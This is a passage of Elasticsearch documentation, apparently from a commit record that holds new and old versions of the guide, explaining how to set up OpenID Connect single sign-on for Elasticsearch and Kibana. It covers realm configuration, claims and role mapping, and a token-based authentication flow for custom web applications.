to the tokens ( access token and ID Token ) that the\nOpenID Connect Provider issues.\n\n==== Register the RP with an OpenID Connect Provider\n\nThe Relying Party ( {es} and the custom web app ) will need to be registered as\nclient with the OpenID Connect Provider. Note that when registering the\n`Redirect URI`, it needs to be a URL in the custom web app.\n\n==== OpenID Connect Realm\n\nAn OpenID Connect realm needs to be created and configured accordingly\nin {es}. See <<oidc-guide-authentication>>\n\n==== Service Account user for accessing the APIs\n\nThe realm is designed with the assumption that there needs to be a privileged entity\nacting as an authentication proxy. In this case, the custom web application is the\nauthentication proxy handling the authentication of end users ( more correctly,\n\"delegating\" the authentication to the OpenID Connect Provider ). The OpenID Connect\nAPIs require authentication and the necessary authorization level for the authenticated\nuser. For this reason, a Service Account user needs to be created and assigned a role\nthat gives them the `manage_oidc` cluster privilege. The use of the `manage_token`\ncluster privilege will be necessary after the authentication takes place, so that the\nthe user can maintain access or be subsequently logged out.\n\n[source,console]\n--------------------------------------------------\nPOST \/_security\/role\/facilitator-role\n{\n \"cluster\" : [\"manage_oidc\", \"manage_token\"]\n}\n--------------------------------------------------\n\n\n[source,console]\n--------------------------------------------------\nPOST \/_security\/user\/facilitator\n{\n \"password\" : \"<somePasswordHere>\",\n \"roles\" : [ \"facilitator-role\"]\n}\n--------------------------------------------------\n\n\n==== Handling the authentication flow\n\nOn a high level, the custom web application would need to perform the following steps in order to\nauthenticate a user with OpenID Connect:\n\n. Make an HTTP POST request to `_security\/oidc\/prepare`, authenticating as the `facilitator` user, using the name of the\nOpenID Connect realm in the {es} configuration in the request body. For more\ndetails, see\n<<security-api-oidc-prepare-authentication>>.\n+\n[source,console]\n--------------------------------------------------\nPOST \/_security\/oidc\/prepare\n{\n \"realm\" : \"oidc1\"\n}\n--------------------------------------------------\n+\n. Handle the response to `\/_security\/oidc\/prepare`. The response from {es} will contain 3 parameters:\n `redirect`, `state`, `nonce`. The custom web application would need to store the values for `state`\n and `nonce` in the user's session (client side in a cookie or server side if session information is\n persisted this way) and redirect the user's browser to the URL that will be contained in the\n `redirect` value.\n. Handle a subsequent response from the OP. After the user is successfully authenticated with the\n OpenID Connect Provider, they will be redirected back to the callback\/redirect URI. Upon receiving\n this HTTP GET request, the custom web app will need to make an HTTP POST request to\n `_security\/oidc\/authenticate`, again - authenticating as the `facilitator` user - passing the URL\n where the user's browser was redirected to, as a parameter, along with the\n values for `nonce` and `state` it had saved in the user's session previously. If more than one\n OpenID Connect realms are configured, the custom web app can specify the name of the realm to be\n used for handling this, but this parameter is optional. For more details, see\n <<security-api-oidc-authenticate>>.\n+\n[source,console]\n-----------------------------------------------------------------------\nPOST \/_security\/oidc\/authenticate\n{\n \"redirect_uri\" : \"https:\/\/oidc-kibana.elastic.co:5603\/api\/security\/oidc\/callback?code=jtI3Ntt8v3_XvcLzCFGq&state=4dbrihtIAt3wBTwo6DxK-vdk-sSyDBV8Yf0AjdkdT5I\",\n \"state\" : \"4dbrihtIAt3wBTwo6DxK-vdk-sSyDBV8Yf0AjdkdT5I\",\n \"nonce\" : \"WaBPH0KqPVdG5HHdSxPRjfoZbXMCicm5v1OiAj0DUFM\",\n \"realm\" : \"oidc1\"\n}\n-----------------------------------------------------------------------\n\/\/ TEST[catch:unauthorized]\n+\nElasticsearch will validate this and if all is correct will respond with an access token that can be used\nas a `Bearer` token for subsequent requests and a refresh token that can be later used to refresh the given\naccess token as described in <<security-api-get-token>>.\n. At some point, if necessary, the custom web application can log the user out by using the\n<<security-api-oidc-logout,OIDC logout API>> passing the access token and refresh token as parameters. For example:\n+\n[source,console]\n--------------------------------------------------\nPOST \/_security\/oidc\/logout\n{\n \"token\" : \"dGhpcyBpcyBub3QgYSByZWFsIHRva2VuIGJ1dCBpdCBpcyBvbmx5IHRlc3QgZGF0YS4gZG8gbm90IHRyeSB0byByZWFkIHRva2VuIQ==\",\n \"refresh_token\": \"vLBPvmAB6KvwvJZr27cS\"\n}\n--------------------------------------------------\n\/\/ TEST[catch:request]\n+\nIf the realm is configured accordingly, this may result in a response with a `redirect` parameter indicating where\nthe user needs to be redirected in the OP in order to complete the logout process.\n","old_contents":"[role=\"xpack\"]\n[[oidc-guide]]\n\n== Configuring single sign-on to the {stack} using OpenID Connect\n\nThe Elastic Stack supports single sign-on (SSO) using OpenID Connect via {kib} using\n{es} as the backend service that holds most of the functionality. {kib} and {es}\ntogether represent an OpenID Connect Relying Party (RP) that supports the authorization code flow and implicit flow as these are defined in the OpenID Connect specification.\n\nThis guide assumes that you have an OpenID Connect Provider where the\nElastic Stack Relying Party will be registered.\n\nNOTE: The OpenID Connect realm support in {kib} is designed with the expectation that it\nwill be the primary authentication method for the users of that {kib} instance. The\n<<oidc-kibana>> section describes what this entails and how you can set it up to support\nother realms if necessary.\n\n[[oidc-guide-op]]\n=== The OpenID Connect Provider\n\nThe OpenID Connect Provider (OP) is the entity in OpenID Connect that is responsible for\nauthenticating the user and for granting the necessary tokens with the authentication and\nuser information to be consumed by the Relying Parties.\n\nIn order for the Elastic Stack to be able use your OpenID Connect Provider for authentication,\na trust relationship needs to be established between the OP and the RP. In the OpenID Connect\nProvider, this means registering the RP as a client. OpenID Connect defines a dynamic client\nregistration protocol but this is usually geared towards real-time client registration and\nnot the trust establishment process for cross security domain single sign on. All OPs will\nalso allow for the manual registration of an RP as a client, via a user interface or (less often)\nvia the consumption of a metadata document.\n\nThe process for registering the Elastic Stack RP will be different from OP to OP and following\nthe provider's relevant documentation is prudent. The information for the\nRP that you commonly need to provide for registration are the following:\n\n- `Relying Party Name`: An arbitrary identifier for the relying party. Neither the specification\nnor the Elastic Stack implementation impose any constraints on this value.\n- `Redirect URI`: This is the URI where the OP will redirect the user's browser after authentication. The\nappropriate value for this will depend on your setup and whether or not {kib} sits behind a proxy or\nload balancer. It will typically be +$\\{kibana-url}\/api\/security\/oidc\/callback+ (for the authorization code flow) or +$\\{kibana-url}\/api\/security\/oidc\/implicit+ (for the implicit flow) where _$\\{kibana-url}_ is the base URL for your {kib} instance. You might also see this\ncalled `Callback URI`.\n\nAt the end of the registration process, the OP will assign a Client Identifier and a Client Secret for the RP ({stack}) to use.\nNote these two values as they will be used in the {es} configuration.\n\n[[oidc-guide-authentication]]\n=== Configure {es} for OpenID Connect authentication\n\nThe following is a summary of the configuration steps required in order to enable authentication\nusing OpenID Connect in {es}:\n\n. <<oidc-enable-http,Enable SSL\/TLS for HTTP>>\n. <<oidc-enable-token,Enable the Token Service>>\n. <<oidc-create-realm,Create one or more OpenID Connect realms>>\n. <<oidc-role-mapping,Configure role mappings>>\n\n[[oidc-enable-http]]\n==== Enable TLS for HTTP\n\nIf your {es} cluster is operating in production mode, then you must\nconfigure the HTTP interface to use SSL\/TLS before you can enable OpenID Connect\nauthentication.\n\nFor more information, see\n<<tls-http>>.\n\n[[oidc-enable-token]]\n==== Enable the token service\n\nThe {es} OpenID Connect implementation makes use of the {es} Token Service. This service\nis automatically enabled if you configure TLS on the HTTP interface, and can be\nexplicitly configured by including the following in your `elasticsearch.yml` file:\n\n[source, yaml]\n------------------------------------------------------------\nxpack.security.authc.token.enabled: true\n------------------------------------------------------------\n\n[[oidc-create-realm]]\n==== Create an OpenID Connect realm\n\nOpenID Connect based authentication is enabled by configuring the appropriate realm within\nthe authentication chain for {es}.\n\nThis realm has a few mandatory settings, and a number of optional settings.\nThe available settings are described in detail in\n<<ref-oidc-settings>>. This\nguide will explore the most common settings.\n\nCreate an OpenID Connect (the realm type is `oidc`) realm in your `elasticsearch.yml` file\nsimilar to what is shown below:\n\nNOTE: The values used below are meant to be an example and are not intended to apply to\nevery use case. The details below the configuration snippet provide insights and suggestions\nto help you pick the proper values, depending on your OP configuration.\n\n[source, yaml]\n-------------------------------------------------------------------------------------\nxpack.security.authc.realms.oidc.oidc1:\n order: 2\n rp.client_id: \"the_client_id\"\n rp.response_type: code\n rp.redirect_uri: \"https:\/\/kibana.example.org:5601\/api\/security\/oidc\/callback\"\n op.issuer: \"https:\/\/op.example.org\"\n op.authorization_endpoint: \"https:\/\/op.example.org\/oauth2\/v1\/authorize\"\n op.token_endpoint: \"https:\/\/op.example.org\/oauth2\/v1\/token\"\n op.jwkset_path: oidc\/jwkset.json\n op.userinfo_endpoint: \"https:\/\/op.example.org\/oauth2\/v1\/userinfo\"\n op.endsession_endpoint: \"https:\/\/op.example.org\/oauth2\/v1\/logout\"\n rp.post_logout_redirect_uri: \"https:\/\/kibana.example.org:5601\/logged_out\"\n claims.principal: sub\n claims.groups: \"http:\/\/example.info\/claims\/groups\"\n-------------------------------------------------------------------------------------\n\nThe configuration values used in the example above are:\n\nxpack.security.authc.realms.oidc.oidc1::\n This defines a new `oidc` authentication realm named \"oidc1\".\n See <<realms>> for more explanation of realms.\n\norder::\n You should define a unique order on each realm in your authentication chain.\n It is recommended that the OpenID Connect realm be at the bottom of your authentication\n chain (that is, that it has the _highest_ order).\n\nrp.client_id::\n This, usually opaque, arbitrary string, is the Client Identifier that was assigned to the Elastic Stack RP by the OP upon\n registration.\n\nrp.response_type::\n This is an identifier that controls which OpenID Connect authentication flow this RP supports and also\n which flow this RP requests the OP should follow. Supported values are\n - `code`, which means that the RP wants to use the Authorization Code flow. If your OP supports the\n Authorization Code flow, you should select this instead of the Implicit Flow.\n - `id_token token` which means that the RP wants to use the Implicit flow and we also request an oAuth2\n access token from the OP, that we can potentially use for follow up requests ( UserInfo ). This\n should be selected if the OP offers a UserInfo endpoint in its configuration, or if you know that\n the claims you will need to use for role mapping are not available in the ID Token.\n - `id_token` which means that the RP wants to use the Implicit flow, but is not interested in getting\n an oAuth2 token too. Select this if you are certain that all necessary claims will be contained in\n the ID Token or if the OP doesn't offer a User Info endpoint.\n\nrp.redirect_uri::\n The redirect URI where the OP will redirect the browser after authentication. This needs to be\n _exactly_ the same as the one <<oidc-guide-op, configured with the OP upon registration>> and will\n typically be +$\\{kibana-url}\/api\/security\/oidc\/callback+ where _$\\{kibana-url}_ is the base URL for your {kib} instance\n\nop.issuer::\n A verifiable Identifier for your OpenID Connect Provider. An Issuer Identifier is usually a case sensitive URL.\n The value for this setting should be provided by your OpenID Connect Provider.\n\nop.authorization_endpoint::\n The URL for the Authorization Endpoint in the OP. This is where the user's browser\n will be redirected to start the authentication process. The value for this setting should be provided by your\n OpenID Connect Provider.\n\nop.token_endpoint::\n The URL for the Token Endpoint in the OpenID Connect Provider. This is the endpoint where\n {es} will send a request to exchange the code for an ID Token. This setting is optional when\n you use the implicit flow. The value for this setting should be provided by your OpenID Connect Provider.\n\nop.jwkset_path::\n The path to a file or a URL containing a JSON Web Key Set with the key material that the OpenID Connect\n Provider uses for signing tokens and claims responses. If a path is set, it is resolved relative to the {es}\n config directory.\n {es} will automatically monitor this file for changes and will reload the configuration whenever\n it is updated. Your OpenID Connect Provider should provide you with this file or a URL where it is available.\n\nop.userinfo_endpoint::\n (Optional) The URL for the UserInfo Endpoint in the OpenID Connect Provider. This is the endpoint of the OP that\n can be queried to get further user information, if required. The value for this setting should be provided by your\n OpenID Connect Provider.\n\nop.endsession_endpoint::\n (Optional) The URL to the End Session Endpoint in the OpenID Connect Provider. This is the endpoint where the user's\n browser will be redirected after local logout, if the realm is configured for RP initiated Single Logout and\n the OP supports it. The value for this setting should be provided by your OpenID Connect Provider.\n\nrp.post_logout_redirect_uri::\n (Optional) The Redirect URL where the OpenID Connect Provider should redirect the user after a\n successful Single Logout (assuming `op.endsession_endpoint` above is also set). This should be set to a value that\n will not trigger a new OpenID Connect Authentication, such as +$\\{kibana-url}\/logged_out+ where _$\\{kibana-url}_ is\n the base URL for your {kib} instance.\n\nclaims.principal:: See <<oidc-claims-mapping>>.\nclaims.groups:: See <<oidc-claims-mapping>>.\n\nA final piece of configuration of the OpenID Connect realm is to set the `Client Secret` that was assigned\nto the RP during registration in the OP. This is a secure setting and as such is not defined in the realm\nconfiguration in `elasticsearch.yml` but added to the\n<<secure-settings,elasticsearch keystore>>.\nFor instance\n\n\n[source,sh]\n----\nbin\/elasticsearch-keystore add xpack.security.authc.realms.oidc.oidc1.rp.client_secret\n----\n\n\nNOTE: According to the OpenID Connect specification, the OP should also make their configuration\navailable at a well known URL, which is the concatenation of their `Issuer` value with the\n`.well-known\/openid-configuration` string. For example: `https:\/\/op.org.com\/.well-known\/openid-configuration`\nThat document should contain all the necessary information to configure the OpenID Connect realm in {es}.\n\n\n[[oidc-claims-mapping]]\n==== Claims mapping\n\n===== Claims and scopes\n\nWhen authenticating to {kib} using OpenID Connect, the OP will provide information about the user\nin the form of OpenID Connect Claims, that can be included either in the ID Token, or be retrieved from the\nUserInfo endpoint of the OP. The claim is defined as a piece of information asserted by the OP\nfor the authenticated user. Simply put, a claim is a name\/value pair that contains information about\nthe user. Related to claims, we also have the notion of OpenID Connect Scopes. Scopes are identifiers\nthat are used to request access to specific lists of claims. The standard defines a set of scope\nidentifiers that can be requested. The only mandatory one is `openid`, while commonly used ones are\n`profile` and `email`. The `profile` scope requests access to the `name`,`family_name`,`given_name`,`middle_name`,`nickname`,\n`preferred_username`,`profile`,`picture`,`website`,`gender`,`birthdate`,`zoneinfo`,`locale`, and `updated_at` claims.\nThe `email` scope requests access to the `email` and `email_verified` claims. The process is that\nthe RP requests specific scopes during the authentication request. If the OP Privacy Policy\nallows it and the authenticating user consents to it, the related claims are returned to the\nRP (either in the ID Token or as a UserInfo response).\n\nThe list of the supported claims will vary depending on the OP you are using, but you can expect\nthe https:\/\/openid.net\/specs\/openid-connect-core-1_0.html#StandardClaims[Standard Claims] to be\nlargely supported.\n\n[[oidc-claim-to-property]]\n===== Mapping claims to user properties\n\nThe goal of claims mapping is to configure {es} in such a way as to be able to map the values of\nspecified returned claims to one of the <<oidc-user-properties, user properties>> that are supported\nby {es}. These user properties are then utilized to identify the user in the {kib} UI or the audit\nlogs, and can also be used to create <<oidc-role-mapping, role mapping>> rules.\n\nThe recommended steps for configuring OpenID Claims mapping are as follows:\n\n. Consult your OP configuration to see what claims it might support. Note that\n the list provided in the OP's metadata or in the configuration page of the OP\n is a list of potentially supported claims. However, for privacy reasons it might\n not be a complete one, or not all supported claims will be available for all\n authenticated users.\n\n. Read through the list of <<oidc-user-properties, user properties>> that {es}\n supports, and decide which of them are useful to you, and can be provided by\n your OP in the form of claims. At a _minimum_, the `principal` user property\n is required.\n\n. Configure your OP to \"release\" those claims to your {stack} Relying\n party. This process greatly varies by provider. You can use a static\n configuration while others will support that the RP requests the scopes that\n correspond to the claims to be \"released\" on authentication time. See\n <<ref-oidc-settings,`rp.requested_scopes`>> for details about how\n to configure the scopes to request. To ensure interoperability and minimize\n the errors, you should only request scopes that the OP supports, and which you\n intend to map to {es} user properties.\n\n NOTE: You can only map claims with values that are strings, numbers, boolean values or an array\n of the aforementioned.\n\n. Configure the OpenID Connect realm in {es} to associate the {es} user properties (see\n <<oidc-user-properties, the listing>> below), to the name of the claims that your\n OP will release. In the example above, we have configured the `principal` and\n `groups` user properties as follows:\n\n .. `claims.principal: sub` : This instructs {es} to look for the OpenID Connect claim named `sub`\n in the ID Token that the OP issued for the user ( or in the UserInfo response ) and assign the\n value of this claim to the `principal` user property. `sub` is a commonly used claim for the\n principal property as it is an identifier of the user in the OP and it is also a required\n claim of the ID Token, thus offering guarantees that it will be available. It is, however,\n only used as an example here, the OP may provide another claim that is a better fit for your needs.\n\n .. `claims.groups: \"http:\/\/example.info\/claims\/groups\"` : Similarly, this instructs {es} to look\n for the claim with the name `http:\/\/example.info\/claims\/groups` (note that this is a URI - an\n identifier, treated as a string and not a URL pointing to a location that will be retrieved)\n either in the ID Token or in the UserInfo response, and map the value(s) of it to the user\n property `groups` in {es}. There is no standard claim in the specification that is used for\n expressing roles or group memberships of the authenticated user in the OP, so the name of the\n claim that should be mapped here, will vary greatly between providers. Consult your OP\n documentation for more details.\n\n[[oidc-user-properties]]\n===== {es} user properties\n\nThe {es} OpenID Connect realm can be configured to map OpenID Connect claims to the\nfollowing properties on the authenticated user:\n\nprincipal:: _(Required)_\n This is the _username_ that will be applied to a user that authenticates\n against this realm.\n The `principal` appears in places such as the {es} audit logs.\n\nNOTE: If the principal property fails to be mapped from a claim, the authentication fails.\n\ngroups:: _(Recommended)_\n If you wish to use your OP's concept of groups or roles as the basis for a\n user's {es} privileges, you should map them with this property.\n The `groups` are passed directly to your <<oidc-role-mapping, role mapping rules>>.\n\nname:: _(Optional)_ The user's full name.\nmail:: _(Optional)_ The user's email address.\ndn:: _(Optional)_ The user's X.500 _Distinguished Name_.\n\n\n===== Extracting partial values from OpenID Connect claims\n\nThere are some occasions where the value of a claim may contain more information\nthan you wish to use within {es}. A common example of this is one where the\nOP works exclusively with email addresses, but you would like the user's\n`principal` to use the _local-name_ part of the email address.\nFor example if their email address was `james.wong@staff.example.com`, then you\nwould like their principal to simply be `james.wong`.\n\nThis can be achieved using the `claim_patterns` setting in the {es}\nrealm, as demonstrated in the realm configuration below:\n\n[source, yaml]\n-------------------------------------------------------------------------------------\nxpack.security.authc.realms.oidc.oidc1:\n order: 2\n rp.client_id: \"the_client_id\"\n rp.response_type: code\n rp.redirect_uri: \"https:\/\/kibana.example.org:5601\/api\/security\/oidc\/callback\"\n op.authorization_endpoint: \"https:\/\/op.example.org\/oauth2\/v1\/authorize\"\n op.token_endpoint: \"https:\/\/op.example.org\/oauth2\/v1\/token\"\n op.userinfo_endpoint: \"https:\/\/op.example.org\/oauth2\/v1\/userinfo\"\n op.endsession_endpoint: \"https:\/\/op.example.org\/oauth2\/v1\/logout\"\n op.issuer: \"https:\/\/op.example.org\"\n op.jwkset_path: oidc\/jwkset.json\n claims.principal: email_verified\n claim_patterns.principal: \"^([^@]+)@staff\\\\.example\\\\.com$\"\n-------------------------------------------------------------------------------------\n\nIn this case, the user's `principal` is mapped from the `email_verified` claim, but a\nregular expression is applied to the value before it is assigned to the user.\nIf the regular expression matches, then the result of the first group is used as the\neffective value. If the regular expression does not match then the claim\nmapping fails.\n\nIn this example, the email address must belong to the `staff.example.com` domain,\nand then the local-part (anything before the `@`) is used as the principal.\nAny users who try to login using a different email domain will fail because the\nregular expression will not match against their email address, and thus their\nprincipal user property - which is mandatory - will not be populated.\n\nIMPORTANT: Small mistakes in these regular expressions can have significant\nsecurity consequences. For example, if we accidentally left off the trailing\n`$` from the example above, then we would match any email address where the\ndomain starts with `staff.example.com`, and this would accept an email\naddress such as `admin@staff.example.com.attacker.net`. It is important that\nyou make sure your regular expressions are as precise as possible so that\nyou do not inadvertently open an avenue for user impersonation attacks.\n\n[[third-party-login]]\n==== Third party initiated single sign-on\n\nThe Open ID Connect realm in {es} supports 3rd party initiated login as described in the\nhttps:\/\/openid.net\/specs\/openid-connect-core-1_0.html#ThirdPartyInitiatedLogin[relevant specification].\n\nThis allows the OP itself or another, third party other than the RP, to initiate the authentication\nprocess while requesting the OP to be used for the authentication. Please note that the Elastic\nStack RP should already be configured for this OP, in order for this process to succeed.\n\n\n[[oidc-logout]]\n==== OpenID Connect Logout\n\nThe OpenID Connect realm in {es} supports RP-Initiated Logout Functionality as\ndescribed in the\nhttps:\/\/openid.net\/specs\/openid-connect-session-1_0.html#RPLogout[relevant part of the specification]\n\nIn this process, the OpenID Connect RP (the Elastic Stack in this case) will redirect the user's\nbrowser to predefined URL of the OP after successfully completing a local logout. The OP can then\nlogout the user also, depending on the configuration, and should finally redirect the user back to the\nRP. The `op.endsession_endpoint` in the realm configuration determines the URL in the OP that the browser\nwill be redirected to. The `rp.post_logout_redirect_uri` setting determines the URL to redirect\nthe user back to after the OP logs them out.\n\nWhen configuring `rp.post_logout_redirect_uri`, care should be taken to not point this to a URL that\nwill trigger re-authentication of the user. For instance, when using OpenID Connect to support\nsingle sign-on to {kib}, this could be set to +$\\{kibana-url}\/logged_out+, which will show a user-\nfriendly message to the user.\n\n[[oidc-ssl-config]]\n==== OpenID Connect Realm SSL Configuration\n\nOpenID Connect depends on TLS to provide security properties such as encryption in transit and endpoint authentication. The RP\nis required to establish back-channel communication with the OP in order to exchange the code for an ID Token during the\nAuthorization code grant flow and in order to get additional user information from the UserInfo endpoint. Furthermore, if\nyou configure `op.jwks_path` as a URL, {es} will need to get the OP's signing keys from the file hosted there. As such, it is\nimportant that {es} can validate and trust the server certificate that the OP uses for TLS. Since the system truststore is\nused for the client context of outgoing https connections, if your OP is using a certificate from a trusted CA, no additional\nconfiguration is needed.\n\nHowever, if the issuer of your OP's certificate is not trusted by the JVM on which {es} is running (e.g it uses a organization CA), then you must configure\n{es} to trust that CA. Assuming that you have the CA certificate that has signed the certificate that the OP uses for TLS\nstored in the \/oidc\/company-ca.pem` file stored in the configuration directory of {es}, you need to set the following\nproperty in the realm configuration:\n\n[source, yaml]\n-------------------------------------------------------------------------------------\nxpack.security.authc.realms.oidc.oidc1:\n order: 1\n ...\n ssl.certificate_authorities: [\"\/oidc\/company-ca.pem\"]\n-------------------------------------------------------------------------------------\n\n[[oidc-role-mapping]]\n=== Configuring role mappings\n\nWhen a user authenticates using OpenID Connect, they are identified to the Elastic Stack,\nbut this does not automatically grant them access to perform any actions or\naccess any data.\n\nYour OpenID Connect users cannot do anything until they are assigned roles. This can be done\nthrough either the\n<<security-api-put-role-mapping,add role mapping API>> or with\n<<authorization_realms,authorization realms>>.\n\nNOTE: You cannot use <<mapping-roles-file,role mapping files>>\nto grant roles to users authenticating via OpenID Connect.\n\nThis is an example of a simple role mapping that grants the `example_role` role\nto any user who authenticates against the `oidc1` OpenID Connect realm:\n\n[source,console]\n--------------------------------------------------\nPUT \/_security\/role_mapping\/oidc-example\n{\n \"roles\": [ \"example_role\" ], <1>\n \"enabled\": true,\n \"rules\": {\n \"field\": { \"realm.name\": \"oidc1\" }\n }\n}\n--------------------------------------------------\n\n<1> The `example_role` role is *not* a builtin Elasticsearch role.\nThis example assumes that you have created a custom role of your own, with\nappropriate access to your <<roles-indices-priv,data streams, indices,>> and\n{kibana-ref}\/kibana-privileges.html#kibana-feature-privileges[Kibana features].\n\nThe user properties that are mapped via the realm configuration are used to process\nrole mapping rules, and these rules determine which roles a user is granted.\n\nThe user fields that are provided to the role\nmapping are derived from the OpenID Connect claims as follows:\n\n- `username`: The `principal` user property\n- `dn`: The `dn` user property\n- `groups`: The `groups` user property\n- `metadata`: See <<oidc-user-metadata>>\n\nFor more information, see <<mapping-roles>> and\n<<security-role-mapping-apis>>.\n\nIf your OP has the ability to provide groups or roles to RPs via tha use of\nan OpenID Claim, then you should map this claim to the `claims.groups` setting in\nthe {es} realm (see <<oidc-claim-to-property>>), and then make use of it in a role mapping\nas per the example below.\n\nThis mapping grants the {es} `finance_data` role, to any users who authenticate\nvia the `oidc1` realm with the `finance-team` group membership.\n\n[source,console]\n--------------------------------------------------\nPUT \/_security\/role_mapping\/oidc-finance\n{\n \"roles\": [ \"finance_data\" ],\n \"enabled\": true,\n \"rules\": { \"all\": [\n { \"field\": { \"realm.name\": \"oidc1\" } },\n { \"field\": { \"groups\": \"finance-team\" } }\n ] }\n}\n--------------------------------------------------\n\nIf your users also exist in a repository that can be directly accessed by {es}\n(such as an LDAP directory) then you can use\n<<authorization_realms, authorization realms>> instead of role mappings.\n\nIn this case, you perform the following steps:\n1. In your OpenID Connect realm, assign a claim to act as the lookup userid,\n by configuring the `claims.principal` setting.\n2. Create a new realm that can lookup users from your local repository (e.g. an\n `ldap` realm)\n3. In your OpenID Connect realm, set `authorization_realms` to the name of the realm you\n created in step 2.\n\n[[oidc-user-metadata]]\n=== User metadata\n\nBy default users who authenticate via OpenID Connect will have some additional metadata\nfields. These fields will include every OpenID Claim that is provided in the authentication response\n(regardless of whether it is mapped to an {es} user property). For example,\nin the metadata field `oidc(claim_name)`, \"claim_name\" is the name of the\nclaim as it was contained in the ID Token or in the User Info response. Note that these will\ninclude all the https:\/\/openid.net\/specs\/openid-connect-core-1_0.html#IDToken[ID Token claims]\nthat pertain to the authentication event, rather than the user themselves.\n\nThis behaviour can be disabled by adding `populate_user_metadata: false` as\na setting in the oidc realm.\n\n[[oidc-kibana]]\n=== Configuring {kib}\n\nOpenID Connect authentication in {kib} requires a small number of additional settings\nin addition to the standard {kib} security configuration. The\n{kibana-ref}\/using-kibana-with-security.html[{kib} security documentation]\nprovides details on the available configuration options that you can apply.\n\nIn particular, since your {es} nodes have been configured to use TLS on the HTTP\ninterface, you must configure {kib} to use a `https` URL to connect to {es}, and\nyou may need to configure `elasticsearch.ssl.certificateAuthorities` to trust\nthe certificates that {es} has been configured to use.\n\nOpenID Connect authentication in {kib} is also subject to the\n`xpack.security.sessionTimeout` setting that is described in the {kib} security\ndocumentation, and you may wish to adjust this timeout to meet your local needs.\n\nThe three additional settings that are required for OpenID Connect support are shown below:\n\n[source, yaml]\n------------------------------------------------------------\nxpack.security.authc.providers:\n oidc.oidc1:\n order: 0\n realm: \"oidc1\"\n------------------------------------------------------------\n\nThe configuration values used in the example above are:\n\n`xpack.security.authc.providers`::\nAdd `oidc` provider to instruct {kib} to use OpenID Connect single sign-on as the\nauthentication method. This instructs Kibana to attempt to initiate an SSO flow\neverytime a user attempts to access a URL in Kibana, if the user is not already\nauthenticated. If you also want to allow users to login with a username and password,\nyou must enable the `basic` authentication provider too. For example:\n\n[source, yaml]\n------------------------------------------------------------\nxpack.security.authc.providers:\n oidc.oidc1:\n order: 0\n realm: \"oidc1\"\n basic.basic1:\n order: 1\n------------------------------------------------------------\n\nThis will allow users that haven't already authenticated with OpenID Connect to\nlog in using the {kib} login form.\n\n`xpack.security.authc.providers.oidc.<provider-name>.realm`::\nThe name of the OpenID Connect realm in {es} that should handle authentication\nfor this Kibana instance.\n\n[[oidc-without-kibana]]\n=== OpenID Connect without {kib}\n\nThe OpenID Connect realm is designed to allow users to authenticate to {kib} and as\nsuch, most of the parts of the guide above make the assumption that {kib} is used.\nThis section describes how a custom web application could use the relevant OpenID\nConnect REST APIs in order to authenticate the users to {es}, with OpenID Connect.\n\nSingle sign-on realms such as OpenID Connect and SAML make use of the Token Service in\n{es} and in principle exchange a SAML or OpenID Connect Authentication response for\nan {es} access token and a refresh token. The access token is used as credentials for subsequent calls to {es}. The\nrefresh token enables the user to get new {es} access tokens after the current one\nexpires.\n\nNOTE: The {es} Token Service can be seen as a minimal oAuth2 authorization server\nand the access token and refresh token mentioned above are tokens that pertain\n_only_ to this authorization server. They are generated and consumed _only_ by {es}\nand are in no way related to the tokens ( access token and ID Token ) that the\nOpenID Connect Provider issues.\n\n==== Register the RP with an OpenID Connect Provider\n\nThe Relying Party ( {es} and the custom web app ) will need to be registered as\nclient with the OpenID Connect Provider. Note that when registering the\n`Redirect URI`, it needs to be a URL in the custom web app.\n\n==== OpenID Connect Realm\n\nAn OpenID Connect realm needs to be created and configured accordingly\nin {es}. See <<oidc-guide-authentication>>\n\n==== Service Account user for accessing the APIs\n\nThe realm is designed with the assumption that there needs to be a privileged entity\nacting as an authentication proxy. In this case, the custom web application is the\nauthentication proxy handling the authentication of end users ( more correctly,\n\"delegating\" the authentication to the OpenID Connect Provider ). The OpenID Connect\nAPIs require authentication and the necessary authorization level for the authenticated\nuser. For this reason, a Service Account user needs to be created and assigned a role\nthat gives them the `manage_oidc` cluster privilege. The use of the `manage_token`\ncluster privilege will be necessary after the authentication takes place, so that the\nthe user can maintain access or be subsequently logged out.\n\n[source,console]\n--------------------------------------------------\nPOST \/_security\/role\/facilitator-role\n{\n \"cluster\" : [\"manage_oidc\", \"manage_token\"]\n}\n--------------------------------------------------\n\n\n[source,console]\n--------------------------------------------------\nPOST \/_security\/user\/facilitator\n{\n \"password\" : \"<somePasswordHere>\",\n \"roles\" : [ \"facilitator-role\"]\n}\n--------------------------------------------------\n\n\n==== Handling the authentication flow\n\nOn a high level, the custom web application would need to perform the following steps in order to\nauthenticate a user with OpenID Connect:\n\n. Make an HTTP POST request to `_security\/oidc\/prepare`, authenticating as the `facilitator` user, using the name of the\nOpenID Connect realm in the {es} configuration in the request body. For more\ndetails, see\n<<security-api-oidc-prepare-authentication>>.\n+\n[source,console]\n--------------------------------------------------\nPOST \/_security\/oidc\/prepare\n{\n \"realm\" : \"oidc1\"\n}\n--------------------------------------------------\n+\n. Handle the response to `\/_security\/oidc\/prepare`. The response from {es} will contain 3 parameters:\n `redirect`, `state`, `nonce`. The custom web application would need to store the values for `state`\n and `nonce` in the user's session (client side in a cookie or server side if session information is\n persisted this way) and redirect the user's browser to the URL that will be contained in the\n `redirect` value.\n. Handle a subsequent response from the OP. After the user is successfully authenticated with the\n OpenID Connect Provider, they will be redirected back to the callback\/redirect URI. Upon receiving\n this HTTP GET request, the custom web app will need to make an HTTP POST request to\n `_security\/oidc\/authenticate`, again - authenticating as the `facilitator` user - passing the URL\n where the user's browser was redirected to, as a parameter, along with the\n values for `nonce` and `state` it had saved in the user's session previously. If more than one\n OpenID Connect realms are configured, the custom web app can specify the name of the realm to be\n used for handling this, but this parameter is optional. For more details, see\n <<security-api-oidc-authenticate>>.\n+\n[source,console]\n-----------------------------------------------------------------------\nPOST \/_security\/oidc\/authenticate\n{\n \"redirect_uri\" : \"https:\/\/oidc-kibana.elastic.co:5603\/api\/security\/oidc\/callback?code=jtI3Ntt8v3_XvcLzCFGq&state=4dbrihtIAt3wBTwo6DxK-vdk-sSyDBV8Yf0AjdkdT5I\",\n \"state\" : \"4dbrihtIAt3wBTwo6DxK-vdk-sSyDBV8Yf0AjdkdT5I\",\n \"nonce\" : \"WaBPH0KqPVdG5HHdSxPRjfoZbXMCicm5v1OiAj0DUFM\",\n \"realm\" : \"oidc1\"\n}\n-----------------------------------------------------------------------\n\/\/ TEST[catch:unauthorized]\n+\nElasticsearch will validate this and if all is correct will respond with an access token that can be used\nas a `Bearer` token for subsequent requests and a refresh token that can be later used to refresh the given\naccess token as described in 